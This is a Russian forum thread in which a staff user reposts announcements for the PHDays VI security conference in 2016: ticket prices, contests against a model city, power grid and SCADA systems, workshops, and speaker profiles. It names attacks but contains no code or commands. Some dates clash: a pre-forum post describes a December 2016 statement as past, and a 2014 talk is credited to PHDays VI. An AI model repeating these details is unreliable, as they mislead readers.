• На проекте открылась регистрация только для продавцов. Для обычных пользователей будет открыта позже. Подробнее.
    P.S. Не надо скидывать ссылки на форумы, где у вас ноль сообщений. Подобные заявки будут отклонятся.

Hack & IT conf PHDays VI

ddd

(•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿
Команда форума
WebOwner
WebVoice
Шестой международный форум по практической безопасности Positive Hack Days состоится 17 и 18 мая 2016 года в московском Центре международной торговли (Москва, Краснопресненская набережная, дом 12.).

Чуть не пропустил халяву.
Оргкомитет PHDays VI принял решение не повышать цены на билеты 30 января и продлить действие скидки Early Birds еще на две недели. До 14 февраля 2016 года стоимость участия в двух днях форума составит 7337 рублей. С 15 февраля билет на два дня форума подорожает до 9600 рублей, на один день — до 7337 рублей, а с 1 марта — до 14 400 и 9600 рублей соответственно.

Напомним и о бесплатных способах принять участие в форуме. Вы можете выступить с исследованием в области ИБ (вторая волна Call for Papers стартует уже 17 февраля), проявить себя в одном из хакерских конкурсов (отборочные соревнования и регистрация откроются ближе к мероприятию) или выйти в финал конкурса киберпанковских рассказов, правила которого будут опубликованы на этой неделе. Любой желающий также может организовать интерактивный форум PHDays в своем городе (советуем ознакомиться с требованиями к участникам PHDays Everywhere).

17 и 18 мая 2016 года на форуме PHDays VI соберутся четыре тысячи хакеров, специалистов по безопасности, IT-бизнесменов, исследователей, представителей государства и борцов за цифровую свободу. Мероприятие состоится в Центре международной торговли в Москве, на Краснопресненской набережной, дом 12.

Купить билеты можно на этой странице: runet-id.com/event/phdays16.

Видео о PHDays V

Тема о прошлом мероприятии: http://webcriminal.ru/threads/positive-hack-days-v.17138/

P.S. я в этому году поеду.
 

ddd

(•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿
Команда форума
WebOwner
WebVoice
31 января закончилась первая волна приема заявок на участие в шестом международном форуме по практической безопасности Positive Hack Days, который состоится в Москве 17 и 18 мая 2016 года в Центре международной торговли. Желающие выступить на форуме, но не успевшие подать заявку, смогут сделать это в ближайшее время: вторая волна Call for Papers стартует уже 17 февраля и продлится до 31 марта!

А пока мы анонсируем первую группу участников, вошедших в основную техническую программу. В этом году слушатели PHDays узнают, как сорвать большой куш в Microsoft, как с помощью смартфона тестировать безопасность транспортных систем, и выяснят всю подноготную рынка уязвимостей нулевого дня.

Ловушка для хакеров

Впервые на PHDays выступит признанный эксперт по подавлению, предотвращению и ликвидации последствий DDoS-атак Терренс Гаро (Terrence Gareau). Он расскажет, как создать honeypot (ловушку) и организовать сервис с обновляемыми данными о попавшихся DDoS-ботах с помощью Kibana, Elasticsearch, Logstash и AMQP. Терренс Гаро последние два года вместе с командой работал над системой мониторинга и сбора внешней статистики DDoS-атак, и посетители форума смогут ознакомиться с ее исходным кодом.

Охотники за наградой, или Кто есть кто на рынке эксплойтов

Участник пятого PHDays, основатель проекта BeeWise и главный консультант компании secYOUre Альфонсо де Грeгорио (Alfonso de Gregorio) вновь выступит с докладом на международном форуме по практической безопасности. Он продолжит начатую в прошлом году тему продажи эксплойтов. На этот раз Альфонсо подробнее расскажет об участниках рынка эксплойтов и о деятельности брокера уязвимостей нулевого дня и раскроет некоторые аспекты деловой этики.

Как сделать вечный билет на метро

Доклад итальянского исследователя Маттео Беккаро (Matteo Beccaro) посвящен общим вопросам транспортной безопасности, мошенничества и технологических сбоев. Маттео Беккаро рассмотрит несколько серьезных уязвимостей в реальных транспортных системах, в которых используется технология NFC. Ключевой момент выступления — демонстрация открытого приложения для тестирования транспортных систем со смартфона. Доклад будет интересен как профессиональным пентестерам, так и любителям.

Защита веб-приложений с помощью JavaScript

Внедрение клиентских сценариев JavaScript может быть использовано для обнаружения и предотвращения различных атак, поиска уязвимых клиентских компонент, определения утечек данных об инфраструктуре веб-приложений, выявления веб-ботов и инструментальных средств нападения. Ведущие эксперты Positive Technologies Денис Колегов и Арсений Реутов продемонстрируют, как защищать веб-приложения с использованием JavaScript, а также поделятся собственными методами обнаружения инъекций без использования сигнатур и фильтраций по регулярным выражениям. Еще один вопрос, который рассмотрят эксперты, — концепция JavaScript-ловушек на стороне клиента для атак SSRF, IDOR, Command Injection и CSRF.

Как сорвать куш в Microsoft

Еще несколько лет назад американский софтверный гигант Microsoft отказывался принимать участие в программе Bug Bounty, несмотря на то что для конкурентов корпорации вознаграждения за уязвимости давно стали обычной практикой. В последние годы Microsoft стал выплачивать вознаграждение за сообщения о некоторых типах уязвимостей — от 100 до 100 000 долл. На регулярной основе публикуется топ-100 исследователей — участников программы.

Джейсон Шерк (Jason Shirk) — главный стратег службы безопасности Microsoft Security Response Center поведает слушателям о видах вознаграждений и о том, как MSRC работает с исследователями, а также раскроет секреты крупных наград.

Полный список выступлений будет опубликован в апреле на официальном сайте PHDays VI. Для того чтобы бесплатно принять участие в форуме, можно выступить с исследованием в области ИБ, стать участником одного из хакерских конкурсов или написать самый лучший киберпанковский рассказ. Еще один способ попасть на PHDays VI — это купить билет. Напоминаем, что с 15 февраля билет на два дня форума стоит 9600 рублей, на один день — 7337 рублей. С 1 марта цены повысятся до 14 400 и 9600 рублей соответственно.


Источник: phdays.ru
 

ddd

(•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿
Команда форума
WebOwner
WebVoice
Может кто из пользователей форума захочет на халяву пробиться :)


Конкурс молодых ученых в рамках ежегодного форума Positive Hack Days стал хорошей традицией. Подумать только, уже в пятый раз Young School дает начинающим безопасникам возможность представить результаты своих исследований перед ведущими экспертами со всего мира!.. Однако на этот раз мы решили изменить формат Young School: теперь это не конкурс, а секция.

Мы рады объявить о приеме заявок. Приглашаем студентов, аспирантов и независимых молодых ученых, ведущих исследования по различным направлениям ИБ.

Тематика интересующих нас исследований осталась неизменной — практическая безопасность:

  • Новые цели хакерских атак. Internet of things: ботнеты из утюгов, умные браслеты и удаленное управление автомобилями.
  • Компьютерная криминалистика против целевых APT и кибершпионажа.
  • Атаки на платежные системы и ДБО, безопасность payWave, PayPass и Apple Pay.
  • Работа SOC: кейсы, методы, инструменты.
  • Методы борьбы с DDoS-атаками.
  • Безопасность ERP-систем, бизнес-приложений. Противодействие атакам на веб-приложения.
  • Новые векторы и техники атак на мобильные устройства.
  • Защита облачных сред, корпоративных и частных. Безопасность государственных информационных систем и электронного правительства.
  • Прикладная криптография.
  • Методы и средства обеспечения физической безопасности.
  • Защита АСУ ТП (SCADA). Безопасность промышленных систем и современного города.
  • Уязвимости нулевого дня и новые способы доставки эксплойтов.
  • Небезопасная безопасная разработка. SSDL и уязвимости в ИБ-продуктах.
Важное условие: практическая ценность предлагаемых решений должна быть подтверждена экспериментально, а также обоснована с точки зрения новизны и актуальности. Мы не принимаем работы, в которых изложены только идеи (пусть даже гениальные), не подкрепленные конкретными результатами.

Авторы лучших исследований получат возможность выступить перед хакерами и специалистами по безопасности на международном форуме Positive Hack Days VI, который пройдет в Москве 17 и 18 мая. Для каждой работы, прошедшей отбор, организаторы возместят одному из авторов расходы на дорогу и проживание, а соавторы получат билеты на форум.

Заявка
В этом году, в отличие от прошлого, заявка на секцию представляет собой тезисы произвольного формата, на русском или английском языках. Главное требование: рецензенты должны иметь возможность оценить исследование в полном объеме (подробнее см. правила оформления). Рецензентами выступают эксперты из академической среды, имеющие опыт работы в практической безопасности.

Кстати, теперь у участников есть возможность проконсультироваться с организаторами перед подачей заявки. По всем вопросам можно написать Андрею Петухову — youngschool@phdays.com.

Напомним, что впервые PHDays Young School прошел в 2012 году, в финале встретились представители учебных заведений Красноярска, Москвы, Новосибирска, Санкт-Петербурга и Таганрога. Со временем конкурс вышел на международный уровень: в прошлом году финалистами стали молодые ученые из Германии, России, Румынии и США.

Не упустите свой шанс принять участие в Positive Hack Days VI! Заявки принимаются по адресу youngschool@phdays.com до 1 апреля 2016 года.
 

ddd

(•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿
Команда форума
WebOwner
WebVoice
Хакеры и художники — казалось бы, что может быть общего между ними, ведь это совершенно разные миры? Однако и те и другие не понаслышке знают, что такое вдохновение и творческий процесс. Мы решили повторить прошлогодний опыт и собираем на площадке международного форума по практической безопасности Positive Hack Days VI хакеров, художников и всех творческих людей. Рассказываем, что будет за кулисами технической программы.

Для посетителей и участников PHDays пройдет выставка иллюстраций Алексея Андреева — художника из Санкт-Петербурга. Его работы, выполненные в технике digital painting, очень полюбились посетителям прошлогоднего форума. Художник вновь приглашает всех отправиться в путешествие в фантастический мир: привычные глазу объекты и явления предстают в новом свете, и кажется, что все происходящее — правда, что это и есть самая настоящая жизнь. Фантазийные сюжеты, обаятельные герои и невероятное правдоподобие — вот, пожалуй, три главные составляющие картин Андреева.

На этот раз художник приготовил сюрприз — серию картин с дополненной реальностью. Посетители выставки смогут «оживить» картины с помощью смартфона. Для этого нужно будет скачать специальное приложение и просканировать QR-код понравившейся картины. Всего несколько секунд, и вы уже в мире летающих электричек и постапокалиптических монстров. У каждого будет возможность пообщаться с художником и приобрести его картины.

Как и раньше, будет работать игровая зона. Советские игровые автоматы, классика олдскула — «Магистраль», «Морской бой», «Авторалли-М». А также полюбившиеся всем в 90-х годах Sega, Dendy и PlayStation. Подзарядиться энергией перед многочасовыми виртуальными боями или перед новой порцией докладов можно будет в автомате с космической едой. Да-да, той самой, в тюбике, которой питаются космонавты на орбите. Организаторы форума подготовили еще несколько сюрпризов. Например, пообщаться за кулисами можно будет не только с коллегами, но и с самым настоящим роботом. Он ответит на любой вопрос — если, конечно, собеседник ему понравится :)

Любители высокого искусства встретятся с удивительными арт-объектами. Летопись PHDays на панно из дискет, хакерский манифест на большом экране, оптические инсталляции, рассмотреть которые можно только со строго определенного расстояния... Обмануть зрение и в прямом смысле слова услышать, как работает мозг, — все это и многое другое можно будет на PHDays VI.

Не останется в стороне и литература. В этом году снова пройдут чтения, в рамках конкурса киберпанковских рассказов «Взломанное будущее». Рассказы, вышедшие в финал, зачитают бессменные участники форума, создатели культовой радиопередачи «Модель для сборки». Они создадут подходящую атмосферу: чтение пройдет в сопровождении современной электронной музыки. Кстати, у каждого из вас еще есть возможность стать участником конкурса: рассказы принимаются до 15 апреля 2016 года по адресу cyberpunk@ptsecurity.com.

Напомним, что PHDays VI уже не за горами — он состоится 17 и 18 мая 2016 года в Центре международной торговли в Москве. На форуме соберутся со всего мира специалисты по безопасности и хакеры, представители госструктур, бизнесмены, молодые ученые и журналисты. Не упустите шанс принять участие! Купить билеты можно на странице runet-id.com/event/phdays16. Чтобы бесплатно участвовать в форуме, вы можете выступить с исследованием в области ИБ (вторая волна Call for Papers продлится до 31 марта), стать участником одного из хакерских конкурсов (регистрация и отборочные соревнования откроются ближе к маю) или выйти в финал конкурса рассказов.
 

ddd

(•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿
Команда форума
WebOwner
WebVoice
Конкурс CityF: битва между хакерами и безопасниками

Через два месяца состоится шестой форум Positive Hack Days. Уже во всю идет подготовка к мероприятию: объявлена первая группа докладчиков и близится к концу вторая волна Call For Papers, стартовал прием заявок на Young School и конкурс киберпанковских рассказов «Взломанное будущее». Теперь мы рады сообщить, что опубликованы правила соревнования PHDays VI СityF: Противостояние.

PHDays VI СityF: Противостояние

Центральная тема шестого PHDays — противостояние. На этот раз вместо привычных соревнований CTF, мы устраиваем настоящие военные действия. События на площадке будут максимально приближены к реальности: на полигоне PHDays VI СityF развернется масштабная эмуляция городской инфраструктуры. «Хакеры» смогут атаковать город всеми доступными способами, а против них будут команды «защитников» и экспертные центры безопасности — Security Operations Center (SOC).

Инфраструктура

Полигон представляет собой единый город, в котором работают и взаимодействуют между собой банк, телеком-оператор, электроэнергетическая компания (распределительная и магистральная подстанции, гидроэлектростанция, центральный и региональный диспетчерские пункты), офис крупного холдинга и даже «умный» дом. Также полигон содержит в себе эмуляцию сети Интернет с новостными и развлекательными сайтами и соцсетями, которые можно использовать для проведения атак. Отметим, что полигон не статичен и постоянно меняется, в него добавляются новые сервисы, удаляются старые. С ними постоянно взаимодействуют настоящие пользователи.

В начале соревнования команды получат доступ к игровой инфраструктуре, включающей форум BlackMarket. Здесь хакеры смогут продавать добытую в результате взлома информацию, а также получать новые задания.

Правила

В CTF принимают участие множество команд, приглашенных организаторами на роли атакующих, защитников и SOC. Команды могут делать абсолютно все, что не запрещено правилами. За игрой будет непрерывно следить жюри. Командам запрещается:

  • атаковать инфраструктуру полигона,
  • проводить атаки на компьютеры жюри,
  • генерировать неоправданно большой объем трафика (флудить),
  • а «защитникам», кроме того, запрещается блокировать доступ к ресурсам по IP-адресу.
За нарушение правил команда может быть оштрафована или дисквалифицирована. Жюри может уточнить правила в любой момент до начала игры — и менять состояние игровой инфраструктуры во время нее.

За успешные действия командам будут присуждаться награды в различных номинациях. Отметим, что призы смогут получить не только участники CityF, но и интернет-пользователи в рамках PHDays Everywhere, а также те, кто примет участие только в отдельных заданиях (например, во взломе банка или АСУ ТП). Специальные призы получат команды, которые выступят перед публикой с отчетами о проделанной работе.

«Хакеры»

Атаковать город можно будет с площадки PHDays или удаленно, в составе команды или в одиночку. Для удаленной работы «хакеров» предусмотрено подключение по VPN. «Хакеры» не должны нарушать логику построения полигона, разрешается атаковать только определенные объекты. Кроме того, у «хакеров» есть возможность сделать публичное заявление об успешно реализованной атаке.

«Защитники»

В качестве «защитников» могут выступать как сформированные корпоративные команды, так и отдельные специалисты (можно под псевдонимом). У «защитников» будет несколько профильных команд, каждая из которых обеспечит безопасность одного объекта на полигоне — банка, оператора и т. д. У каждой команды будет достаточно времени для настройки средств защиты. В процессе Противостояния «защитники» смогут менять конфигурации средств защиты: каждый сам хозяин своей инфраструктуры. Для обороны объектов можно использовать любые ИБ-средства, в задачи команд входит проектирование, установка, настройка и эксплуатация средств защиты (в случае необходимости можно запросить их у организаторов). Помогать «защитникам» будет команда SOC.

В ходе игры «защитники» должны периодически выступать с отчетами о произошедших инцидентах и проделанной работе по противодействию атакам.

«Внешние SOC»

Каждый SOC выбирает себе несколько объектов (телеком-оператор, банк и т. п.) и обеспечивает их безопасность совместно с командами «защитников». SOC осуществляет мониторинг, помогает «защитникам» обнаруживать атаки. Во время Противостояния SOC должен оперативно оповещать защищающихся об атаках и предлагать меры защиты. Также как и «защитники», команды SOC должны регулярно выступать с отчетами о своей деятельности, представлять статистику защищенности полигона (тренды по атакам и другие метрики).

Главный конкурс PHDays сменил формат: мы отошли от привычного CTF — на форуме развернется настоящая битва хакеров и безопасников. В этот раз сражаться будут три команды: «хакеры», «защитники» и SOC (security operations centers). События на полигоне будут максимально приближены к реальности. В распоряжении команд — эмуляция города, в котором есть банк, телеком-оператор, офис крупного холдинга, электроэнергетическая компания и другие объекты. Помимо команд на полигоне будет множество пользователей и клиентов. Во время игры команды для достижения цели смогут действовать любыми способами, которые не запрещены правилами.

Если вы хотите стать участником этой масштабной битвы — пишете по адресу phd@ptsecurity.com. Кстати, в CTF могут принять участие гости PHDays и интернет-пользователи в рамках PHDays Everywhere, а также те, кто решил попробовать себя в определенных заданиях (например, во взломе банка или АСУ ТП).

Заявки принимаются до 10 апреля 2016 года. Количество мест ограничено!


P.S. не знаю как вы, а я на эту битву заявку подам :)
 

ddd

(•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿
Команда форума
WebOwner
WebVoice
В этом году впервые на Positive Hack Days развернется открытая площадка Hardware Village. Команда этого проекта решила сняться с якоря и принять участие в шестом ежегодном форуме PHDays. Любители хакерского железа смогут «пощупать» оборудование и посетить мастер-классы, на которых ребята поделятся знаниями в области взлома и низкоуровневого программирования.

Hardware Village рассчитан как на опытных хардварщиков, так и на начинающих энтузиастов. В течение двух дней посетителей ждут мастер-классы и лекции матерых хакеров, которые расскажут о своем опыте. Для всех желающих будут доступны целые развалы хакерского железа, которое можно не только посмотреть, но и опробовать в деле.

Первый день будет посвящен проводным сетям и интерфейсам передачи данных: Ethernet, 1-Wire, UART, JTAG, SPI, USB, CAN. Команда Hardware Village расскажет, как подобрать оборудование для конкретных задач и как правильно с ним работать. Вы узнаете все о мультиметрах, осциллографах, логических анализаторах, познакомитесь с самодельными хакерскими девайсами на базе Arduino, ARM, FPGA.

Второй день отдан теме беспроводных сетей: широкий диапазон частот от 125 кГц до 5 ГГц, популярные протоколы обмена — RFID, NFC, Wi-Fi и Bluetooth. Также организаторы подготовили мастер-класс и конкурс по SDR.

Приглашаем всех принять участие. И не забудьте захватить свои девайсы!

На площадке технической зоны форума PHDays VI впервые развернется стенд EAST 4 SCADA. Все, кто интересуется безопасностью АСУ ТП, смогут попробовать свои силы в поиске уязвимостей SCADA-систем и написании собственных эксплойтов — и даже попытаются устроить аварию на тестовой железной дороге.

Команда EAST 4 SCADA проведет мастер-класс, на котором расскажет о типовых уязвимостях индустриальных систем и способах взлома с помощью отечественного open-source-фреймворка EAST (exploits and security tools). Для тестирования на стенде будут представлены различные системы автоматики фирм ABB, Siemens, Rockwell, ICP DAS и других.

Вы узнаете, как проводить поиск уязвимостей в АСУ ТП, компонентах SCADA и PLC, как создавать и запускать тестовые модули и эксплойты, иллюстрирующие риски SCADA-систем. Вы сможете попрактиковать простейшие способы воздействия на тестовые системы АСУ ТП, найти уязвимости и пустить под откос полюбившийся с предыдущих PHDays поезд.

Приглашаем опытных и начинающих взломщиков принять участие. Рекомендуем захватить собственные ноутбуки.
 

ddd

(•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿
Команда форума
WebOwner
WebVoice
Для "халявщиков" :)

До PHDays VI остался всего месяц, но уже сейчас есть отличная возможность размяться перед форумом и попробовать себя в нескольких хакерских конкурсах, которые стартуют 11 и 13 апреля. На кону возможность бесплатно попасть на PHDays!

HackQuest

Компания ONsec готовит традиционный конкурс HackQuest, в котором участники смогут попробовать свои силы в решении различных заданий по информационной безопасности. Задания будут основаны на реальных кейсах, с которыми приходилось работать ONsec во время проектов по аудиту безопасности в 2015 и 2016 годах. Решение каждого задания подтолкнет на исследования и поможет выработать новые практические навыки. Организаторы обещают много веба! Разного, хорошего и, что самое главное, нового. По итогам соревнования участники получат памятные сувениры и инвайты на форум. Конкурс продлится с 13 по 19 апреля.

Best Reverser

Для того чтобы любители (и профессионалы!) ковыряния кода смогли полностью насладиться конференцией PHDays, мы решили провести конкурс Best Reverser чуть раньше. Условия заданий будут вполне обычными для конкурсов такого плана. Победителю достанется ценный приз и инвайт на конференцию. Конкурс пройдет с 11 по 17 апреля.

Информация о старте конкурсов будет опубликована в ближайшее время. Следите за новостями и готовьтесь — будет весело!
 

ddd

(•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿
Команда форума
WebOwner
WebVoice
Новые конкурсы на PHDays VI: ломаем ГЭС и «умный» дом
Форум PHDays всегда славился своей конкурсной программой. Чего только не взламывали за шесть лет: электрическую подстанцию, мобильную связь, систему ДБО. Хакеры сбивали с цели ракетные установки, похищали деньги из банкомата, пускали под откос поезда.

Бо́льшая часть соревнований будет основана на инфраструктуре города СityF и объединена в главное состязание этого года «PHDays VI СityF: Противостояние». Конкурсы форума как всегда имеют практическое значение. Участники будут взламывать АСУ ТП, Интернет вещей, интернет-банки, GSM и сетевое оборудование. Подробности можно узнать на странице форума, а сегодня мы расскажем о двух новых испытаниях в рамках взлома автоматических систем управления — BMS & Smart House Attack и Critical Infrastructure Attack: Blackout.

На полигоне PHDays VI СityF среди прочих объектов развернется стенд электроэнергетической компании (распределительная и магистральная подстанции, гидроэлектростанция, центральный и региональный диспетчерские пункты) и «умный» дом. Участники смогут изучить безопасность реальных систем. Объекты можно будет взломать как простому посетителю форума, так и участникам команд CityF.

Critical Infrastructure Attack: Blackout

Задача хакеров — атаковать модель системы электроснабжения небольшого региона. Модель приближена к реальности как технически, так и в функционально. Она разделена на отдельные части: генерация, передача, распределение и управление электроснабжением. Участникам предлагается нарушить нормальную работу общей системы электроэнергетики.

В части распределения хакеры смогут воздействовать на подстанцию города классом напряжения 10 кВ, которая распределяет электроэнергию на объекты инфраструктуры города (жилые дома, промышленные предприятия). Для дополнительной детализации будет подключена модель дома со множеством систем жизнеобеспечения.

Атаковав часть передачи, можно будет захватить магистральную подстанцию (500 кВ), которая в случае нарушения ее работы позволит атакующим командам устроить не только локальный blackout, но и нарушить нормальную работу общей системы электроэнергетики или «отключить» город.

В части генерации команды смогут воздействовать на гидроэлектростанцию. Это позволит либо отключить передачу электроэнергии от станции, либо повлиять на работу автоматики гидроагрегатов и системы управления станции, например включить аварийный водосброс и затопить город рядом со станцией.

Также атакующие команды могут получить доступ к мониторингу всех систем, так и к управлению энергорайоном, получив доступ к региональному пункту диспетчеризации и управления энергосистемой и к центральной диспетчерской.

Победителю конкурса достанется планшет Apple. Обладателю второго места — Raspberry Pi 2 Ki.

BMS & Smart House Attack

В распоряжении хакеров будут предоставлены системы жизнеобеспечения, начиная от центральных систем распределения электричества, заканчивая розеткой в доме.

Стенд представляет собой гибрид систем автоматизации зданий и «умного дома», среди них система освещения, счетчики воды, лифт, вентиляция и автоматика квартиры-офиса. Задача хакеров — получить контроль над отдельными системами или отключить их при условии, что некоторые из них будут дополнительно защищены. Задача осложняется тем, что энергообеспечение дома напрямую зависит от работы распределительной подстанции города, которую тоже нужно взломать.

Победители соревнования получат подарки от наших партнеров Advantech и «ПроСофт», которые предоставили бо́льшую часть макета и систем автоматики.
 

ddd

(•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿
Команда форума
WebOwner
WebVoice
В начале апреля о Мокси Марлинспайке написали все крупнейшие издания мира. Миллиард пользователей WhatsApp получили обязательное сквозное шифрование трафика на основе алгоритмов его мессенджера Signal. Через месяц, 17 и 18 мая, с Мокси можно будет познакомиться на форуме PHDays VI. На мероприятии выступит не только он, но и Рахул Саси, Пол Викси, Андрей Масалович, Джон Бамбенек.

Обама и Кэмерон против Марлинспайка
Moxie.png


При рождении в 1980 году Мокси получил имя Мэтью Розенфельд. В конце 90-х он переехал в Сан-Франциско. Море и хакинг — две основные страсти человека, который выбрал себе псевдоним Мокси Марлинспайк. Marlinspike означает такелажную свайку для пробивки прядей троса, а Moxie — смелость.

Личный сайт Марлинспайка не случайно называется оруэлловским термином thoughtcrime.org («мыслепреступление»). После разработки в 2009 году онлайн-сервиса WPA Cracker и MitM-атаки SSL stripping спецслужбы стали оказывать Мокси повышенное внимание. В аэропортах он стал объектом особо пристального «дополнительного досмотра». Чуть позже номер его мобильного нашли в контактах Якова Аппельбаума, активиста WikiLeaks, и давление на Мокси усилилось. Однажды Мокси продержали несколько часов в аэропорту, конфисковав все устройства.

Спецслужбы, кажется, напрасно разозлили Марлинспайка. В 2010 году он вместе с Стюартом Андерсоном создал компанию Whisper Systems. Продукты новой фирмы — защищенная система обмена сообщениями TextSecure и программа шифрования звонков RedPhone — заслужили высокие оценки специалистов. Утилиты были бесплатны, в отличие от большинства аналогов, и качественно работали. Но в 2011 году компанию продали в Twitter и разработка заглохла. Туда же на должность главы отдела информационной безопасности ушел Марлинспайк.

Покинув Twitter через полтора года, Марлинспайк реанимировал свое детище, организовав некоммерческую организацию Open Whisper Systems и продолжив разработку TextSecure и RedPhone. К счастью, в Twitter не стали вставлять палки в колеса и разрешили сделать приложения общедоступными.

Сегодня оба продукта заменены мессенджером Signal, выпущенным на платформах iOS и Android. Signal рекомендован не только Эдвардом Сноуденом, но и правозащитной организацией Фонд электронных рубежей (Electronic Frontier Foundation). В рейтинге EFF он набрал семь баллов из семи, что делает его одним из наиболее безопасных. Для сравнения, у Skype в этой таблице один балл, у Viber два, у обычных чатов Telegram — четыре, у «секретных чатов» — семь.

EFF.png


В декабре 2016 года Павел Дуров, отвечая на критику Сноудена и Марлинспайка по поводу незащищенности стандартной переписки в Telegram, заявлял, что среднестатистический пользователь его мессенджера предпочитает синхронизацию шифрованию. У «секретных чатов» ключ шифрования находится на устройстве, а не на удаленном сервере, поэтому они не могут синхронизироваться через облако.

До ноября 2014 года у WhatsApp в рейтинге EEF было два балла из семи, а после начала сотрудничества с Open Whisper Systems стало шесть баллов из семи. Радовались не все. Барак Обама назвал это «проблемой», а премьер-министр Великобритании Дэвид Кэмерон пообещал запретить WhatsApp в случае победы на выборах. С 5 апреля 2016 года сквозное шифрование работает у всех пользователей WhatsApp. Теперь владельцы мессенджера даже при желании ничего не могут выдать спецслужбам. Ни видео, ни голосовой трафик, ни переписку, ни фотографии.

Когда молодежь спрашивает Мокси о первых шагах в карьере разработчика ПО, он советует им не торопиться. «Мой друг, — писал Мокси в 2011 году на Slashdot, — недавно пошутил: большинство программистов узнали о технологиях прежде, чем узнали себя. Если вы молоды, потратьте год вашей жизни на эксперимент, в котором значительная часть вашей жизни будет сосредоточена на открытиях, а не на заработке. Возьмите с друзьями музыкальные инструменты, выучите три аккорда и отправьтесь на гастроли. Найдите заброшенную лодку и пересеките океан. Отправляйтесь автостопом на Аляску. Постройте флот дирижаблей или беспилотник».

Рахул Саси: искусственный интеллект от угонщика дронов
Sasi.jpg


Беспилотники любит другой участник PHDays VI — Рахул Саси (Rahul Sasi). В фильме «Интерстеллар» главный герой со своей дочерью перехватывает управление БПЛА; вот примерно то же самое делает и Рахул. В 2015 году он разработал бэкдор Maldrone для угона квадрокоптеров Parrot AR.Drone 2.0 и DJI Phantom. Работая в связке с эксплойтом Skyjack, вирус Maldrone позволяет угонять сами дроны, перехватывать видеосигнал с захваченных устройств и даже создавать летающую армию заражая соседние дроны. К концу 2016 года число только американских беспилотников достигнет 2,5 миллионов, что заставляет внимательно присмотреться к исследованиям Рахула.

На PHDays VI Рахул Саси расскажет о другом своем проекте — создании автоматизированной системы безопасности, основанной на искусственном интеллекте. Большинство традиционных сканеров безопасности веб-приложений не способны обнаружить логические ошибки безопасности. Докладчик продемонстрирует, как создать инструмент для выявления таких ошибок на основе технологий машинного обучения. С некоторыми подробностями проекта можно ознакомиться в статье, вышедшей в газете The Register.

Джон Бамбенек: как найти преступника № 1

Bambenek.jpg


Черные шляпы бьют не только по сильным и богатым. В анонсе своего выступления на BlackHat Джон Бамбенек (John Bambenek) описывал трагедию, которая произошла в марте 2014 года в Румынии. Программа-вымогатель до такой степени деморализовала пользователя, что он убил себя и своего 4-летнего сына. Мужчина, подхвативший «полицейский» вирус на сайте для взрослых, принял за чистую монету сообщение, что его ждет огромный штраф или тюремное заключение на 11 лет.

В интервью The News Gazette Бамбенек рассказывал, что своим главным профессиональным достижением считывает участие в операции Tovar. В июне 2014 года 150 специалистов из 13 стран смогли обнаружить организатора одной из самых опасных хакерских группировок в истории — Евгения Богачева. Уроженец Анапы, известный под псевдонимами lucky12345 и slavik, похитил около 100 млн долларов у граждан и компаний США. Ему также приписывают разработку вымогательского ПО CryptoLocker и создание ботнета GameOver Zeus. «Богачев и его команда совершили киберпреступления, которые невозможно представить даже в научно-фантастическом кино», — заявлял прокурор, участвующий в расследовании дела. В 2016 году ФБР включила Богачева в список наиболее разыскиваемых киберпреступников, причем за россиянина назначено самое большое вознаграждение (3 млн долларов).

39-летний Бамбенек начал писать компьютерные программы в возрасте 6 лет. Первые свои хакерские исследования он провел еще до поступления в колледж. Учебу оплатили военно-воздушные силы США, где Джон планировал продолжить карьеру после получения степени в области астрофизики. Однако травма колена, полученная в альпинистском походе, поставила крест на карьере в ВВС. Первым крупным местом работы для Джона стала компания Ernst & Young, где он стал менеджером проекта (и, возможно, ходил в одну столовую с создателем WhatsApp Яном Кумом, работавшим после университета в отделе информационной безопасности Ernst & Young).

Помимо охоты на киберпреступников Бамбенек помогает школьникам в Танзании силами организованного им благотворительного фонда, любит стейки и воспитывает четверых детей.

Москва очень понравилась Джону. Посещение города в 2015 году (куда он приезжал на PHDays) он сравнил со взрывом. Надеемся, что участие в форуме 2016 года станет для Бамбенека еще одним незабываемым приключением. Джон расскажет, как можно выявлять злоумышленников, используя особенности преступной сетевой инфраструктуры, которую они создают. С советами Бамбенека по защите от вирусов-вымогателей можно ознакомиться на сайте SANS Technology Institute.

Пол Викси: DNS как линия защиты

Vixie.jpg


В Москву приедет также Пол Викси (Paul Vixie) — основатель Internet Systems Consortium. За новаторские достижения в 2014 году он был включен в Зал славы интернета. В этом списке всего лишь несколько десятков фамилий!

С 1980 года Викси занимается разработкой интернет-протоколов и архитектурой ПО для систем UNIX. Создал программу Cron (для BSD и Linux), считается главным автором и техническим архитектором DNS-сервера BIND 4.9 и BIND 8. Является автором и соавтором около десятка документов RFC, в основном по DNS и аналогичным темам. Получил степень доктора наук в Университете Кэйо за работу, связанную с DNS и DNSSEC.

В своем докладе Викси покажет, как обезопасить DNS и использовать ее для защиты других объектов локальной или глобальной сети. Он расскажет о подмене кэша DNS, расширениях защиты для протокола DNS (DNSSEC), DDoS-атаках, ограничении скорости передачи, межсетевом экране DNS и пассивном DNS-мониторинге.

Андрей Масалович: поиск авианосца в Google

Masalovich.jpg


Выступления подполковника ФАПСИ в отставке Андрея Масаловича мало похожи на типичные доклады по информационной безопасности. Это яркие шоу, на них можно наблюдать за эксплуатацией уязвимостей на сайте Пентагона или за судьбой секретного китайского авианосца. «Я не олимпийский чемпион и даже не мастер — я, скажем так, перворазрядник», — говорил он в интервью Forbes. Но истории Масаловича настолько увлекательны, что слушатели нередко просят продлить его выступление (как это было на PHDays V).

60seconds.png


В 2014 году мастер-класс Масаловича «Жизнь после Сноудена» занял второе место по цитируемости в соцсетях среди нескольких десятков докладов PHDays VI. Особым вниманием пользовались слайды с разделом «Документы» ВКонтакте, где любой желающий может обнаружить сканы чужих документов.

VK.png


Изучение тендерных документов Пентагона прямо во время мастер-класса PHDays не осталось без внимания американских спецслужб. Лауреата стипендии РАН «Выдающийся ученый России» включили в базу ЦРУ как руководителя группы хакеров под кличкой Леший.

EvaluationSpreadsheet.png


